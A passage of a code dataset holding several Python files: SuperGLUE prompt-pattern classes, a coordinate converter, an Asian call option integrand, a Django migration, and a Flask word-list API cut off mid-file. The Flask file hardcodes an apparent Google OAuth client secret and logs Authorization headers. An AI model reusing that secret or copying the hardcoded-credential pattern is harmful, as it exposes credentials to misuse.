== 2:\n return [1, '\"', choice1, '\" or \"', choice2, '\"', 1, premise, joiner, [self.mask], '.'], []\n if self.pattern_id == 0:\n return ['\"', choice1, '\" or \"', choice2, '\"?', premise, joiner, [self.mask], '.'], []\n elif self.pattern_id == 1:\n return [choice1, ' or', \" \" + choice2, '?', premise, joiner, [self.mask], '.'], []\n\n def verbalize(self, label) -> List[str]:\n return []\n\n\nclass WscPVP(PVP):\n is_multi_token = True\n\n @property\n def spell_length(self):\n return self.pattern_id\n\n def get_answers(self, example: InputExample):\n target = \" \" + example.meta['span1_text']\n answers = [target]\n if 'candidates' in example.meta:\n candidates = example.meta['candidates']\n # if len(candidates) > 10:\n # random.shuffle(candidates)\n # candidates = candidates[:10]\n answers += [\" \" + cand for cand in candidates]\n return answers\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n pronoun = example.meta['span2_text']\n pronoun_idx = example.meta['span2_index']\n\n words_a = example.text_a.split()\n words_a[pronoun_idx] = '*' + words_a[pronoun_idx] + '*'\n text_a = ' '.join(words_a)\n text_a = self.shortenable(text_a)\n\n if self.continuous_prompt:\n if self.pattern_id == 1:\n return [1, text_a, \" The pronoun '*\" + pronoun + \"*' refers to\", [self.mask], '.'], []\n elif self.pattern_id == 2:\n return [1, text_a, 1, \" pronoun '*\" + pronoun + \"*' refers to\", [self.mask], '.'], []\n elif self.pattern_id == 3:\n return [1, text_a, 1, \" pronoun '*\" + pronoun + \"*'\", 1, \" to\", [self.mask], '.'], []\n elif self.pattern_id == 9:\n return [3, text_a, 3, \" pronoun '*\" + pronoun + \"*'\", 3, \" to\", [self.mask], '.'], []\n else:\n raise NotImplementedError(self.pattern_id)\n if self.pattern_id == 0:\n return [text_a, \" The pronoun '*\" + pronoun + \"*' refers to\", [self.mask], '.'], []\n elif self.pattern_id == 1:\n return [text_a, \" In the previous sentence, the pronoun '*\" + pronoun + \"*' refers to\", [self.mask],\n '.'], []\n elif self.pattern_id == 2:\n return [text_a,\n \" Question: In the passage above, what does the pronoun '*\" + pronoun + \"*' refer to? Answer:\",\n [self.mask], '.'], []\n\n def encode(self, example: InputExample, priming: bool = False, labeled: bool = False):\n \"\"\"\n Encode an input example using this pattern-verbalizer pair.\n\n :param example: the input example to encode\n :param priming: whether to use this example for priming\n :param labeled: if ``priming=True``, whether the label should be appended to this example\n :return: A tuple, consisting of a list of input ids and a list of token type ids\n \"\"\"\n if self.args.wsc_negative:\n sample = super().encode(example, priming=priming, labeled=labeled)\n return sample\n\n if not priming:\n assert not labeled, \"'labeled' can only be set to true if 'priming' is also set to true\"\n\n tokenizer = self.tokenizer\n prompt_id = tokenizer.num_tokens\n raw_parts_a, raw_parts_b = self.get_parts(example)\n\n raw_parts_a = [x if isinstance(x, tuple) else (x, False) for x in raw_parts_a]\n\n def encode_input(raw_parts):\n parts, flags = [], []\n for x, s in raw_parts:\n if isinstance(x, str):\n x = tokenizer.EncodeAsIds(x)\n flag = [0] * len(x)\n elif isinstance(x, int):\n flag = [1] * x\n x = [prompt_id] * x\n else:\n flag = [0] * len(x)\n parts.append((x, s))\n flags.append((flag, x))\n return parts, flags\n\n parts_a, flags_a = encode_input(raw_parts_a)\n parts_b, flags_b = None, None\n if raw_parts_b:\n raw_parts_b = [x if isinstance(x, tuple) else (x, False) for x in raw_parts_b]\n parts_b, flags_b = encode_input(raw_parts_b)\n answer = self.get_answers(example)[0]\n answer_ids = get_verbalization_ids(answer, tokenizer, force_single_token=False)\n answer_ids = answer_ids + [tokenizer.get_command('eop').Id]\n self.num_truncated += self.truncate(parts_a, parts_b, answer_ids, max_length=self.max_seq_length)\n tokens_a = [token_id for part, _ in parts_a for token_id in part]\n tokens_b = [token_id for part, _ in parts_b for token_id in part] if parts_b else None\n data = build_input_from_ids(tokens_a, tokens_b, answer_ids, self.max_seq_length, self.tokenizer, args=self.args,\n add_cls=True, add_sep=False, add_piece=True)\n ids, types, paddings, position_ids, sep, target_ids, loss_masks = data\n prompt_pos = [idx for idx, token in enumerate(ids) if token == prompt_id]\n ids = [token if token != prompt_id else 0 for token in ids]\n if example.label is not None:\n label = self.label_list.index(example.label)\n else:\n label = 0\n return {'text': np.array(ids, dtype=np.int64), 'target': np.array(target_ids, dtype=np.int64),\n 'attention_mask': np.array(sep, dtype=np.int64), 'loss_mask': np.array(loss_masks, dtype=np.int64),\n \"position_id\": np.array(position_ids, dtype=np.int64),\n 'prompt_pos': np.array(prompt_pos, dtype=np.int64), 'label': label, 'uid': example.guid}\n\n def verbalize(self, label) -> List[str]:\n return []\n\n\nclass RecordPVP(PVP):\n is_multi_token = True\n\n def get_answers(self, example: InputExample):\n choices = example.meta['candidates']\n choices = [\" \" + choice for choice in choices]\n return choices\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n premise = self.shortenable(example.text_a)\n\n assert '@placeholder' in example.text_b, f'question \"{example.text_b}\" does not contain a @placeholder token'\n question_a, question_b = example.text_b.split('@placeholder')\n return [premise, \" \" + question_a.rstrip(), [self.mask], question_b], []\n\n def verbalize(self, label) -> List[str]:\n return []\n\n\nclass RtePVP(PVP):\n VERBALIZER = {\n \"not_entailment\": [\" No\"],\n \"entailment\": [\" Yes\"]\n }\n\n @property\n def spell_length(self):\n return self.pattern_id\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n # switch text_a and text_b to get the correct order\n text_a = example.text_a\n text_b = example.text_b.rstrip(string.punctuation)\n if self.continuous_prompt:\n if self.pattern_id == 1:\n return [1, '\"', self.shortenable(text_b), '\" ?'], [[self.mask], ',', ' \"', self.shortenable(text_a),\n '\"']\n elif self.pattern_id == 2:\n return [1, '\"', self.shortenable(text_b), '\" ?'], [[self.mask], ',', 1, ' \"', self.shortenable(text_a),\n '\"']\n elif self.pattern_id == 3:\n return [1, '\"', self.shortenable(text_b), '\" ?'], [1, [self.mask], ',', 1, ' \"',\n self.shortenable(text_a),\n '\"']\n elif self.pattern_id == 9:\n return [3, '\"', self.shortenable(text_b), '\" ?'], [3, [self.mask], ',', 3, ' \"',\n self.shortenable(text_a),\n '\"']\n else:\n raise NotImplementedError(self.pattern_id)\n elif self.pattern_id == 0:\n return ['\"', self.shortenable(text_b), '\" ?'], [[self.mask], ', \"', self.shortenable(text_a), '\"']\n elif self.pattern_id == 1:\n return [self.shortenable(text_b), '?'], [[self.mask], ',', self.shortenable(\" \" + text_a)]\n if self.pattern_id == 2:\n return ['\"', self.shortenable(text_b), '\" ?'], [[self.mask], '. \"', self.shortenable(text_a), '\"']\n elif self.pattern_id == 3:\n return [self.shortenable(text_b), '?'], [[self.mask], '.', self.shortenable(\" \" + text_a)]\n elif self.pattern_id == 4:\n return [self.shortenable(text_a), ' question:', self.shortenable(\" \" + text_b), ' True or False? answer:',\n [self.mask]], []\n\n def verbalize(self, label) -> List[str]:\n if self.pattern_id == 4:\n return [' true'] if label == 'entailment' else [' false']\n return RtePVP.VERBALIZER[label]\n\n\nclass CbPVP(RtePVP):\n VERBALIZER = {\n \"contradiction\": [\" No\"],\n \"entailment\": [\" Yes\"],\n \"neutral\": [\" Maybe\"]\n }\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n if self.pattern_id == 4:\n text_a = self.shortenable(example.text_a)\n text_b = self.shortenable(\" \" + example.text_b)\n return [text_a, ' question:', text_b, ' true, false or neither? answer:', [self.mask]], []\n return super().get_parts(example)\n\n def verbalize(self, label) -> List[str]:\n if not self.continuous_prompt and self.pattern_id == 4:\n return [' true'] if label == 'entailment' else [' false'] if label == 'contradiction' else [' neither']\n return CbPVP.VERBALIZER[label]\n\n\nclass BoolQPVP(PVP):\n VERBALIZER_A = {\n \"false\": [\" No\"],\n \"true\": [\" Yes\"]\n }\n\n VERBALIZER_B = {\n \"false\": [\" false\"],\n \"true\": [\" true\"]\n }\n\n @property\n def spell_length(self):\n return self.pattern_id\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n passage = example.text_a\n question = example.text_b\n\n if self.continuous_prompt:\n if self.pattern_id == 1:\n return [1, self.shortenable(passage), ' Question:', self.shortenable(\" \" + question), '? Answer:',\n [self.mask], '.'], []\n elif self.pattern_id == 2:\n return [1, self.shortenable(passage), 1, ' Question:', self.shortenable(\" \" + question), '? Answer:',\n [self.mask], '.'], []\n elif self.pattern_id == 3:\n return [1, self.shortenable(passage), 1, ' Question:', self.shortenable(\" \" + question), '? Answer:', 1,\n [self.mask], '.'], []\n elif self.pattern_id == 9:\n return [3, self.shortenable(passage), 3, ' Question:', self.shortenable(\" \" + question), '? Answer:', 3,\n [self.mask], '.'], []\n elif self.pattern_id < 2:\n return [self.shortenable(passage), ' Question:', self.shortenable(\" \" + question), '? Answer:', [self.mask],\n '.'], []\n elif self.pattern_id < 4:\n return [self.shortenable(passage), ' Based on the previous passage,', self.shortenable(\" \" + question),\n '?', [self.mask], '.'], []\n else:\n return ['Based on the following passage ', self.shortenable(\" \" + question), '?', [self.mask], '.',\n self.shortenable(\" \" + passage)], []\n\n def verbalize(self, label) -> List[str]:\n if self.continuous_prompt or self.pattern_id == 0 or self.pattern_id == 2 or self.pattern_id == 4:\n return BoolQPVP.VERBALIZER_A[label]\n else:\n return BoolQPVP.VERBALIZER_B[label]\n\n\nclass MultiRcPVP(PVP):\n VERBALIZER = {\n 0: [\" No\"],\n 1: [\" Yes\"]\n }\n\n @property\n def spell_length(self):\n return self.pattern_id\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n passage = self.remove_final_punc(self.shortenable(example.text_a.rstrip()))\n question = self.remove_final_punc(example.text_b.rstrip())\n answer = example.meta['answer']\n if self.continuous_prompt:\n if self.pattern_id == 1:\n return [passage, '.', 1, ' Question:', \" \" + question, '? Is it', \" \" + answer, '?', [self.mask],\n '.'], []\n elif self.pattern_id == 2:\n return [passage, '.', 1, ' Question:', \" \" + question, '?', 1, \" \" + answer, '?', [self.mask],\n '.'], []\n elif self.pattern_id == 3:\n return [passage, '.', 1, ' Question:', \" \" + question, '?', 1, \" \" + answer, '?', 1, [self.mask],\n '.'], []\n else:\n raise NotImplementedError(self.pattern_id)\n if self.pattern_id == 0:\n return [passage, '. Question:', \" \" + question, '? Is it', \" \" + answer, '?', [self.mask], '.'], []\n if self.pattern_id == 1:\n return [passage, '. Question:', \" \" + question, '? Is the correct answer \"', answer, '\"?', [self.mask],\n '.'], []\n if self.pattern_id == 2:\n return [passage, '. Based on the previous passage,', \" \" + question, '? Is \"', answer,\n '\" a correct answer?', [self.mask], '.'], []\n if self.pattern_id == 3:\n return [passage, \" \" + question, '- [', [self.mask], ']', answer], []\n\n def verbalize(self, label) -> List[str]:\n if not self.continuous_prompt and self.pattern_id == 3:\n return [' False'] if label == 0 else [' True']\n return MultiRcPVP.VERBALIZER[label]\n\n\nclass WicPVP(PVP):\n VERBALIZER_A = {\n \"false\": [\" No\"],\n \"true\": [\" Yes\"]\n }\n VERBALIZER_B = {\n \"false\": [\"2\"],\n \"true\": [\"b\"]\n }\n\n @property\n def spell_length(self):\n return self.pattern_id\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n text_a = example.text_a\n text_b = example.text_b\n word = example.meta['word']\n\n if self.continuous_prompt:\n if self.pattern_id == 1:\n return [self.shortenable('\"' + text_a + '\" / \"' + text_b + '\"'), 1, ' Similar sense of \"' + word + '\"?',\n [self.mask], '.'], []\n elif self.pattern_id == 2:\n return [self.shortenable('\"' + text_a + '\" / \"' + text_b + '\"'), 1, ' Similar sense of \"' + word + '\"?',\n 1, [self.mask], '.'], []\n elif self.pattern_id == 3:\n return [1, self.shortenable('\"' + text_a + '\" / \"' + text_b + '\"'), 1,\n ' Similar sense of \"' + word + '\"?', 1, [self.mask], '.'], []\n elif self.pattern_id == 0:\n return [self.shortenable('\"' + text_a + '\" / \"' + text_b + '\"'), ' Similar sense of \"' + word + '\"?',\n [self.mask], '.'], []\n elif self.pattern_id == 1:\n return [self.shortenable(text_a), self.shortenable(\" \" + text_b),\n ' Does' + \" \" + word + ' have the same meaning in both sentences?', [self.mask]], []\n elif self.pattern_id == 2:\n return [word, ' . Sense (1) (a)', self.shortenable(' \"' + text_a + '\"'), ' (', [self.mask], ') \"', text_b,\n '\"'], []\n\n def verbalize(self, label) -> List[str]:\n if not self.continuous_prompt and self.pattern_id == 2:\n return WicPVP.VERBALIZER_B[label]\n return WicPVP.VERBALIZER_A[label]\n\n\nclass AgnewsPVP(PVP):\n VERBALIZER = {\n \"1\": [\"World\"],\n \"2\": [\"Sports\"],\n \"3\": [\"Business\"],\n \"4\": [\"Tech\"]\n }\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n\n text_a = self.shortenable(example.text_a)\n text_b = self.shortenable(example.text_b)\n\n if self.pattern_id == 0:\n return [[self.mask], ':', text_a, text_b], []\n elif self.pattern_id == 1:\n return [[self.mask], 'News:', text_a, text_b], []\n elif self.pattern_id == 2:\n return [text_a, '(', [self.mask], ')', text_b], []\n elif self.pattern_id == 3:\n return [text_a, text_b, '(', [self.mask], ')'], []\n elif self.pattern_id == 4:\n return ['[ Category:', [self.mask], ']', text_a, text_b], []\n elif self.pattern_id == 5:\n return [[self.mask], '-', text_a, text_b], []\n else:\n raise ValueError(\"No pattern implemented for id {}\".format(self.pattern_id))\n\n def verbalize(self, label) -> List[str]:\n return AgnewsPVP.VERBALIZER[label]\n\n\nclass YahooPVP(PVP):\n VERBALIZER = {\n \"1\": [\"Society\"],\n \"2\": [\"Science\"],\n \"3\": [\"Health\"],\n \"4\": [\"Education\"],\n \"5\": [\"Computer\"],\n \"6\": [\"Sports\"],\n \"7\": [\"Business\"],\n \"8\": [\"Entertainment\"],\n \"9\": [\"Relationship\"],\n \"10\": [\"Politics\"],\n }\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n\n text_a = self.shortenable(example.text_a)\n text_b = self.shortenable(example.text_b)\n\n if self.pattern_id == 0:\n return [[self.mask], ':', text_a, text_b], []\n elif self.pattern_id == 1:\n return [[self.mask], 'Question:', text_a, text_b], []\n elif self.pattern_id == 2:\n return [text_a, '(', [self.mask], ')', text_b], []\n elif self.pattern_id == 3:\n return [text_a, text_b, '(', [self.mask], ')'], []\n elif self.pattern_id == 4:\n return ['[ Category:', [self.mask], ']', text_a, text_b], []\n elif self.pattern_id == 5:\n return [[self.mask], '-', text_a, text_b], []\n else:\n raise ValueError(\"No pattern implemented for id {}\".format(self.pattern_id))\n\n def verbalize(self, label) -> List[str]:\n return YahooPVP.VERBALIZER[label]\n\n\nclass MnliPVP(PVP):\n VERBALIZER_A = {\n \"contradiction\": [\"Wrong\"],\n \"entailment\": [\"Right\"],\n \"neutral\": [\"Maybe\"]\n }\n VERBALIZER_B = {\n \"contradiction\": [\"No\"],\n \"entailment\": [\"Yes\"],\n \"neutral\": [\"Maybe\"]\n }\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n text_a = self.shortenable(self.remove_final_punc(example.text_a))\n text_b = self.shortenable(example.text_b)\n\n if self.pattern_id == 0 or self.pattern_id == 2:\n return ['\"', text_a, '\" ?'], [[self.mask], ', \"', text_b, '\"']\n elif self.pattern_id == 1 or self.pattern_id == 3:\n return [text_a, '?'], [[self.mask], ',', text_b]\n\n def verbalize(self, label) -> List[str]:\n if self.pattern_id == 0 or self.pattern_id == 1:\n return MnliPVP.VERBALIZER_A[label]\n return MnliPVP.VERBALIZER_B[label]\n\n\nclass YelpPolarityPVP(PVP):\n VERBALIZER = {\n \"1\": [\"bad\"],\n \"2\": [\"good\"]\n }\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n text = self.shortenable(example.text_a)\n\n if self.pattern_id == 0:\n return ['It was', [self.mask], '.', text], []\n elif self.pattern_id == 1:\n return [text, '. All in all, it was', [self.mask], '.'], []\n elif self.pattern_id == 2:\n return ['Just', [self.mask], \"!\"], [text]\n elif self.pattern_id == 3:\n return [text], ['In summary, the restaurant is', [self.mask], '.']\n else:\n raise ValueError(\"No pattern implemented for id {}\".format(self.pattern_id))\n\n def verbalize(self, label) -> List[str]:\n return YelpPolarityPVP.VERBALIZER[label]\n\n\nclass YelpFullPVP(YelpPolarityPVP):\n VERBALIZER = {\n \"1\": [\"terrible\"],\n \"2\": [\"bad\"],\n \"3\": [\"okay\"],\n \"4\": [\"good\"],\n \"5\": [\"great\"]\n }\n\n def verbalize(self, label) -> List[str]:\n return YelpFullPVP.VERBALIZER[label]\n\n\nclass XStancePVP(PVP):\n VERBALIZERS = {\n 'en': {\"FAVOR\": [\"Yes\"], \"AGAINST\": [\"No\"]},\n 'de': {\"FAVOR\": [\"Ja\"], \"AGAINST\": [\"Nein\"]},\n 'fr': {\"FAVOR\": [\"Oui\"], \"AGAINST\": [\"Non\"]}\n }\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n\n text_a = self.shortenable(example.text_a)\n text_b = self.shortenable(example.text_b)\n\n if self.pattern_id == 0 or self.pattern_id == 2 or self.pattern_id == 4:\n return ['\"', text_a, '\"'], [[self.mask], '. \"', text_b, '\"']\n elif self.pattern_id == 1 or self.pattern_id == 3 or self.pattern_id == 5:\n return [text_a], [[self.mask], '.', text_b]\n\n def verbalize(self, label) -> List[str]:\n lang = 'de' if self.pattern_id < 2 else 'en' if self.pattern_id < 4 else 'fr'\n return XStancePVP.VERBALIZERS[lang][label]\n\n\ndef get_verbalization_ids(word: str, tokenizer, force_single_token: bool) -> Union[int, List[int]]:\n \"\"\"\n Get the token ids corresponding to a verbalization\n\n :param word: the verbalization\n :param tokenizer: the tokenizer to use\n :param force_single_token: whether it should be enforced that the verbalization corresponds to a single token.\n If set to true, this method returns a single int instead of a list and throws an error if the word\n corresponds to multiple tokens.\n :return: either the list of token ids or the single token id corresponding to this word\n \"\"\"\n ids = tokenizer.EncodeAsIds(word).tokenization\n if not force_single_token:\n return ids\n assert len(ids) == 1, \\\n f'Verbalization \"{word}\" does not correspond to a single token, got {tokenizer.DecodeIds(ids)}'\n verbalization_id = ids[0]\n assert verbalization_id not in tokenizer.command_id_map, \\\n f'Verbalization {word} is mapped to a special token {tokenizer.IdToToken(verbalization_id)}'\n return verbalization_id\n\nclass AtomicPVP(PVP):\n is_multi_token = True\n VERBALIZER = {\n \"oEffect\":[\"The effect on others will be \"],\n \"oReact\":[\"As a result, others feel \"],\n \"oWant\":[\"After, others will want to \"],\n \"xAttr\":[\"PersonX is \"],\n \"xEffect\":[\"The effect on PersonX will be \"],\n \"xIntent\":[\"PersonX did this to \"],\n \"xNeed\":[\"Before, PersonX needs to \"],\n \"xReact\":[\"PersonX will be \"],\n \"xReason\":[\"PersonX did this because \"],\n \"xWant\":[\"After, PersonX will want to \"]\n }\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n # switch text_a and text_b to get the correct order\n text_a = example.text_a\n text_b = example.text_b.rstrip(string.punctuation)\n return ['\"', self.shortenable(text_a), '\";'], [[self.mask], '\"', self.shortenable(text_b), '\"']\n\n def verbalize(self, label) -> List[str]:\n return AtomicPVP.VERBALIZER[label]\n\nPVPS = {\n 'rte': RtePVP,\n 'wic': WicPVP,\n 'cb': CbPVP,\n 'wsc': WscPVP,\n 'boolq': BoolQPVP,\n 'copa': CopaPVP,\n 'multirc': MultiRcPVP,\n 'record': RecordPVP,\n 'ax-b': RtePVP,\n 'ax-g': RtePVP,\n 'atomic': AtomicPVP,\n}\n","sub_path":"tasks/superglue/pvp.py","file_name":"pvp.py","file_ext":"py","file_size_in_byte":39531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"624466881","text":"import numpy\n\ndef cart2sph(z, y, x):\n \"\"\"Convert from cartesian coordinates (x,y,z) to spherical (elevation,\n azimuth, radius). Output is in radians. \n \n usage:\n array3xN[el,az,rad] = cart2sph(array3xN[x,y,z])\n OR\n elevation, azimuth, radius = cart2sph(x,y,z)\n \n If working in DKL space, z = Luminance, y = S and x = LM\"\"\"\n \n elevation = numpy.empty([512,512])\n radius = numpy.empty([512,512])\n azimuth = numpy.empty([512,512])\n \n radius = numpy.sqrt(x**2 + y**2 + z**2)\n azimuth = numpy.arctan2(y, x)\n #Calculating the elevation from x,y up\n elevation = numpy.arctan2(z, numpy.sqrt(x**2+y**2))\n\n#convert azimuth and elevation angles into degrees\n azimuth *=(180.0/numpy.pi)\n elevation *=(180.0/numpy.pi)\n\n sphere = numpy.array([elevation, azimuth, radius])\n sphere = numpy.rollaxis(sphere, 0, 3)\n\n return sphere","sub_path":"Tests/myCart2Sph.py","file_name":"myCart2Sph.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"472624628","text":"\"\"\" Definition for class AsianCall, a concrete implementation of Integrand \"\"\"\n\nfrom ._integrand import Integrand\nfrom .._util import ParameterError\n\nfrom numpy import exp, maximum, log, zeros, array\n\n\nclass AsianCall(Integrand):\n \"\"\" Specify and generate payoff values of an Asian Call option \"\"\"\n\n def __init__(self, bm_measure, volatility=0.5, start_price=30,\n strike_price=25, interest_rate=0, mean_type='arithmetic'):\n \"\"\"\n Initialize AsianCall Integrand's'\n\n Args:\n bm_measure (TrueMeasure): A BrownianMotion Measure object\n volatility (float): sigma, the volatility of the asset\n start_price (float): S(0), the asset value at t=0\n strike_price (float): strike_price, the call/put offer\n interest_rate (float): r, the annual interest rate\n mean_type (string): 'arithmetic' or 'geometric' mean\n \"\"\"\n mean_type = mean_type.lower()\n if mean_type not in ['arithmetic', 'geometric']:\n raise ParameterError(\"mean_type must either 'arithmetic' or 'geometric'\")\n dimension = bm_measure.dimension\n super().__init__(dimension,\n bm_measure=bm_measure,\n dim_frac=array([0] + [dimension[i] / dimension[i - 1] for i in range(1, len(dimension))]),\n volatility=volatility,\n start_price=start_price,\n strike_price=strike_price,\n interest_rate=interest_rate,\n mean_type=[mean_type],\n exercise_time=[bm_measure[i].time_vector[-1] for i in range(len(dimension))])\n\n def g(self, x):\n \"\"\"\n Original integrand to be integrated\n\n Args:\n x: nodes, :math:`\\\\boldsymbol{x}_{\\\\mathfrak{u},i} = i^{\\\\mathtt{th}}` \\\n row of an :math:`n \\\\cdot |\\\\mathfrak{u}|` matrix\n\n Returns:\n :math:`n \\\\cdot p` matrix with values \\\n :math:`f(\\\\boldsymbol{x}_{\\\\mathfrak{u},i},\\\\mathbf{c})` where if \\\n :math:`\\\\boldsymbol{x}_i' = (x_{i, \\\\mathfrak{u}},\\\\mathbf{c})_j`, \\\n then :math:`x'_{ij} = x_{ij}` for :math:`j \\\\in \\\\mathfrak{u}`, \\\n and :math:`x'_{ij} = c` otherwise\n \"\"\"\n s_fine = self.start_price * exp(\n (self.interest_rate - self.volatility ** 2 / 2) *\n self.bm_measure.time_vector + self.volatility * x)\n y = self.get_discounted_payoffs(s_fine, self.dimension)\n if self.dim_frac > 0:\n s_course = s_fine[:, int(self.dim_frac - 1):: int(self.dim_frac)]\n d_course = self.dimension / self.dim_frac\n y_course = self.get_discounted_payoffs(s_course, d_course)\n y -= y_course\n return y\n\n def get_discounted_payoffs(self, stock_path, dimension):\n \"\"\"\n Calculate the discounted payoff from the stock path\n\n stock_path (ndarray): option prices at monitoring times\n dimension (int): number of dimensions\n \"\"\"\n if self.mean_type == 'arithmetic':\n avg = (self.start_price / 2 +\n stock_path[:, :-1].sum(1) +\n stock_path[:, -1] / 2) / \\\n dimension\n elif self.mean_type == 'geometric':\n avg = exp((log(self.start_price) / 2 +\n log(stock_path[:, :-1]).sum(1) +\n log(stock_path[:, -1]) / 2) /\n dimension)\n y = maximum(avg - self.strike_price, 0) * exp(-self.interest_rate * self.exercise_time)\n return y\n\n def __repr__(self, attributes=[]):\n \"\"\"\n Print important attribute values\n\n Args: \n attributes (list): list of attributes to print\n\n Returns:\n string of self info\n \"\"\"\n attributes = ['volatility', 'start_price', 'strike_price', 'interest_rate', 'mean_type', 'exercise_time']\n return super().__repr__(attributes)\n","sub_path":"python_prototype/qmcpy/integrand/asian_call.py","file_name":"asian_call.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"410529030","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [(\"posters\", \"0003_ordermixin_comment\")]\n\n operations = [\n migrations.AlterField(\n model_name=\"ordermixin\",\n name=\"comments\",\n field=models.TextField(null=True, verbose_name=\"kommentar\", blank=True),\n )\n ]\n","sub_path":"apps/posters/migrations/0004_auto_20151119_1236.py","file_name":"0004_auto_20151119_1236.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"436947383","text":"from flask_restful import Resource, reqparse, marshal_with, marshal, fields, abort, inputs\nfrom flask import request, redirect, jsonify\nimport requests\nfrom . import api\nfrom .models import User, Word, List, ListsWords, Fillword\nfrom . import db\nimport json\n\n\nGOOGLE_CLIENT_ID = \"632277419807-7k3fohav6n5dtrbhdrrga12vipr22qi5.apps.googleusercontent.com\"\nGOOGLE_CLIENT_SECRET = \"gb-xu0MzAu4dFr8dAkJCc-hk\"\nGOOGLE_DISCOVERY_URL = (\n \"https://accounts.google.com/.well-known/openid-configuration\"\n)\n\n\n# TEST DATA\nwords_json = [\n {\n \"id\": 0,\n \"word_name\": \"Word0\",\n \"word_type\": \"noun\"\n }\n]\n\nlists_json = [\n {\n \"id\": 0,\n \"name\": \"List0\"\n },\n {\n \"id\": 1,\n \"name\": \"List1\"\n }\n]\n\n\n# FIELDS\nuser_fields = {\n \"id\": fields.Integer,\n \"email\": fields.String\n}\n\nwords_fields = {\n \"id\": fields.Integer,\n \"name\": fields.String(attribute=\"word_name\"),\n \"type\": fields.Integer(attribute=\"word_type\"),\n \"definitions\": fields.String(attribute=\"definitions\"),\n \"examples\": fields.String(attribute=\"examples\")\n}\n\nwords_ids_fields = {\n \"id\": fields.Integer\n}\n\nlists_fields = {\n \"id\": fields.Integer,\n \"name\": fields.String\n}\n\nlists_with_words_ids_fields = {\n \"id\": fields.Integer,\n \"name\": fields.String,\n \"words\": fields.List(fields.Nested(words_ids_fields))\n}\n\nlists_words_fields = {\n \"id\": fields.Integer,\n \"name\": fields.String,\n \"words\": fields.List(fields.Nested(words_fields))\n}\n\n\n# GOOGLE\ndef getGoogleUser():\n auth = request.headers.get(\"Authorization\")\n print(auth)\n res = requests.get(\"https://openidconnect.googleapis.com/v1/userinfo\", headers={\"Authorization\": auth})\n\n print(res.json())\n\n if res.status_code == 401:\n return abort(401)\n\n return res\n\ndef getUserWithEmail():\n res = getGoogleUser()\n\n if res:\n email = res.json()[\"email\"]\n return User.query.filter_by(email=email).first(), email\n else:\n return res, None\n\ndef getUser():\n user, email = getUserWithEmail()\n return user\n\ndef get_google_provider_cfg():\n return requests.get(GOOGLE_DISCOVERY_URL).json()\n\n\n# LISTS\nclass ListWords(Resource):\n def get(self, list_id):\n user = getUser()\n\n if user:\n parser = reqparse.RequestParser()\n parser.add_argument(\"type\", type=str)\n info_type = parser.parse_args()[\"type\"]\n\n words = user.lists.filter_by(id=list_id).first().words.all()\n if not info_type or info_type == \"full\":\n return marshal(words, words_fields)\n elif info_type == \"id\":\n return marshal(words, words_ids_fields)\n else:\n return abort(401)\n\n return abort(404)\n\n def post(self, list_id):\n user = getUser()\n if user:\n parser = reqparse.RequestParser()\n parser.add_argument(\"wordId\", type=int)\n \n word_id = parser.parse_args()[\"wordId\"]\n\n if list_id and word_id:\n listObj = user.lists.filter_by(id=list_id).first()\n \n if not listObj.words.filter_by(id=word_id).first():\n word = user.words.filter_by(id=word_id).first()\n listObj.words.append(word)\n db.session.commit()\n else:\n return abort(403)\n\n return marshal(listObj, lists_with_words_ids_fields)\n\n return abort(404)\n\n\nclass ListValidation:\n @staticmethod\n def validate_name(value):\n if len(value) < 2:\n raise ValueError(\"List's length can't be less then 2 symbols\")\n\n return value\n\nclass Lists(Resource):\n def get(self):\n user = getUser()\n\n if user:\n lists = user.lists.all()\n\n parser = reqparse.RequestParser()\n parser.add_argument(\"with_words_id\", type=str)\n with_words_id = parser.parse_args()[\"with_words_id\"]\n\n if with_words_id == \"true\":\n return marshal(lists, lists_with_words_ids_fields)\n\n return marshal(lists, lists_fields)\n else:\n return abort(401)\n \n def post(self):\n user = getUser()\n\n if user:\n parser = reqparse.RequestParser()\n parser.add_argument(\"name\", type=ListValidation.validate_name)\n\n name = parser.parse_args()[\"name\"]\n listObj = List(name=name)\n db.session.add(listObj)\n user.lists.append(listObj)\n db.session.commit()\n\n return marshal(listObj, lists_fields), 201\n \n return abort(404)\n\n def put(self):\n user = getUser()\n\n if user:\n parser = reqparse.RequestParser()\n parser.add_argument(\"id\", type=int)\n parser.add_argument(\"name\", type=ListValidation.validate_name)\n parser.add_argument(\"words\", type=str)\n\n list_id = parser.parse_args()[\"id\"]\n name = parser.parse_args()[\"name\"]\n words = parser.parse_args()[\"words\"]\n\n listObj = user.lists.filter_by(id=list_id).first()\n if listObj:\n listObj.name = name\n\n if words:\n for word in words.split(\",\"):\n word_from_list = listObj.words.filter_by(id=word).first()\n listObj.words.remove(word_from_list)\n\n db.session.commit()\n return marshal(listObj, lists_with_words_ids_fields), 200\n \n return abort(404)\n \n def delete(self):\n user = getUser()\n\n if user:\n parser = reqparse.RequestParser()\n parser.add_argument(\"listId\", type=int)\n\n list_id = parser.parse_args()[\"listId\"]\n print(user.lists.all())\n listObj = user.lists.filter_by(id=list_id).first()\n user.lists.remove(listObj)\n \n db.session.delete(listObj)\n db.session.commit()\n return '', 204\n \n return abort(404)\n\n\n# WORDS\nclass WordValidation:\n @staticmethod\n def validate_type(value):\n value = int(value)\n if value < 0 